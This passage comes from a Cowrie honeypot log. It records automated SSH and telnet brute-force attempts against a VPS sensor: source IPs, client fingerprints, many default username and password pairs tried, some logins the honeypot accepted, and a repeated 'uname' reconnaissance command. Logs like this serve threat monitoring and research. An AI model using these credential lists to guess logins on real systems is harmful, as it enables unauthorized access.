8-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:44.226821Z","src_ip":"212.227.235.229","session":"8c2fc29aff59"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:44.979797Z","src_ip":"212.227.235.229","session":"8c2fc29aff59"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":47643,"dst_ip":"1.2.3.4","dst_port":22,"session":"81dd1af726a8","protocol":"ssh","message":"New connection: 45.125.211.194:47643 (1.2.3.4:22) [session: 81dd1af726a8]","sensor":"my-vps","timestamp":"2025-08-28T03:18:45.959950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:45.973610Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:46.191575Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:46.231132Z","src_ip":"212.227.235.229","session":"8c2fc29aff59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58476,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e76826acabb","protocol":"ssh","message":"New connection: 212.227.125.160:58476 (1.2.3.4:22) [session: 7e76826acabb]","sensor":"my-vps","timestamp":"2025-08-28T03:18:46.934285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:46.935352Z","src_ip":"212.227.125.160","session":"7e76826acabb"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.011110Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.163305Z","src_ip":"212.227.125.160","session":"7e76826acabb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:18:47.462284Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.463042Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.674229Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.675346Z","src_ip":"45.125.211.194","session":"81dd1af726a8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:47.847946Z","src_ip":"212.227.125.160","session":"7e76826acabb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:49.078818Z","src_ip":"212.227.125.160","session":"7e76826acabb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51570,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e41a86dede3","protocol":"ssh","message":"New connection: 212.227.235.229:51570 (1.2.3.4:22) [session: 5e41a86dede3]","sensor":"my-vps","timestamp":"2025-08-28T03:18:55.333909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:18:55.335221Z","src_ip":"212.227.235.229","session":"5e41a86dede3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:18:55.577576Z","src_ip":"212.227.235.229","session":"5e41a86dede3"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T03:18:56.308443Z","src_ip":"212.227.235.229","session":"5e41a86dede3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:18:57.554041Z","src_ip":"212.227.235.229","session":"5e41a86dede3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63663,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed4e0f6db7a4","protocol":"ssh","message":"New connection: 212.227.235.229:63663 (1.2.3.4:22) [session: ed4e0f6db7a4]","sensor":"my-vps","timestamp":"2025-08-28T03:18:59.247258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:18:59.248194Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:18:59.408797Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58547,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f500d84948b","protocol":"ssh","message":"New connection: 45.125.211.194:58547 (1.2.3.4:22) [session: 6f500d84948b]","sensor":"my-vps","timestamp":"2025-08-28T03:19:00.274333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:00.286850Z","src_ip":"45.125.211.194","session":"6f500d84948b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:00.485461Z","src_ip":"45.125.211.194","session":"6f500d84948b"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora","message":"login attempt [aurora/aurora] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:00.821869Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33776,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f7a131f1c1","protocol":"ssh","message":"New connection: 212.227.235.229:33776 (1.2.3.4:22) [session: 25f7a131f1c1]","sensor":"my-vps","timestamp":"2025-08-28T03:19:01.283809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:01.285013Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:01.364593Z","src_ip":"45.125.211.194","session":"6f500d84948b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:01.532736Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1","message":"login attempt [aurora/aurora1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:01.982529Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:02.279423Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:02.576059Z","src_ip":"45.125.211.194","session":"6f500d84948b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:02.857684Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:19:02.858475Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:03.107902Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:03.109008Z","src_ip":"212.227.235.229","session":"25f7a131f1c1"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora123","message":"login attempt [aurora/aurora123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:03.144678Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1234","message":"login attempt [aurora/aurora1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:04.304744Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46103,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d3a169c81d8","protocol":"ssh","message":"New connection: 212.227.235.229:46103 (1.2.3.4:22) [session: 5d3a169c81d8]","sensor":"my-vps","timestamp":"2025-08-28T03:19:05.632886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:19:05.634264Z","src_ip":"212.227.235.229","session":"5d3a169c81d8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:19:05.726886Z","src_ip":"212.227.235.229","session":"5d3a169c81d8"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora12345","message":"login attempt [aurora/aurora12345] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:05.877104Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.login.failed","username":"zahar","password":"zahar","message":"login attempt [zahar/zahar] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:06.108619Z","src_ip":"212.227.235.229","session":"5d3a169c81d8"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:07.037562Z","src_ip":"212.227.235.229","session":"ed4e0f6db7a4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:07.202850Z","src_ip":"212.227.235.229","session":"5d3a169c81d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58150,"dst_ip":"1.2.3.4","dst_port":23,"session":"59bfaff0ce0e","protocol":"telnet","message":"New connection: 212.227.125.160:58150 (1.2.3.4:23) [session: 59bfaff0ce0e]","sensor":"my-vps","timestamp":"2025-08-28T03:19:08.567793Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:08.651072Z","src_ip":"212.227.125.160","session":"59bfaff0ce0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:08.670861Z","src_ip":"212.227.125.160","session":"59bfaff0ce0e"}
{"eventid":"cowrie.session.closed","duration":30.86666202545166,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:09.280197Z","src_ip":"103.175.5.202","session":"f66f26c1b202"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43770,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1d10e7a310d","protocol":"ssh","message":"New connection: 212.227.125.160:43770 (1.2.3.4:22) [session: d1d10e7a310d]","sensor":"my-vps","timestamp":"2025-08-28T03:19:10.092895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:10.093707Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:10.306089Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:10.944796Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:11.448805Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:19:11.449475Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:11.662641Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:11.665302Z","src_ip":"212.227.125.160","session":"d1d10e7a310d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":30510,"dst_ip":"1.2.3.4","dst_port":22,"session":"020a552e09f2","protocol":"ssh","message":"New connection: 45.125.211.194:30510 (1.2.3.4:22) [session: 020a552e09f2]","sensor":"my-vps","timestamp":"2025-08-28T03:19:14.988687Z"}
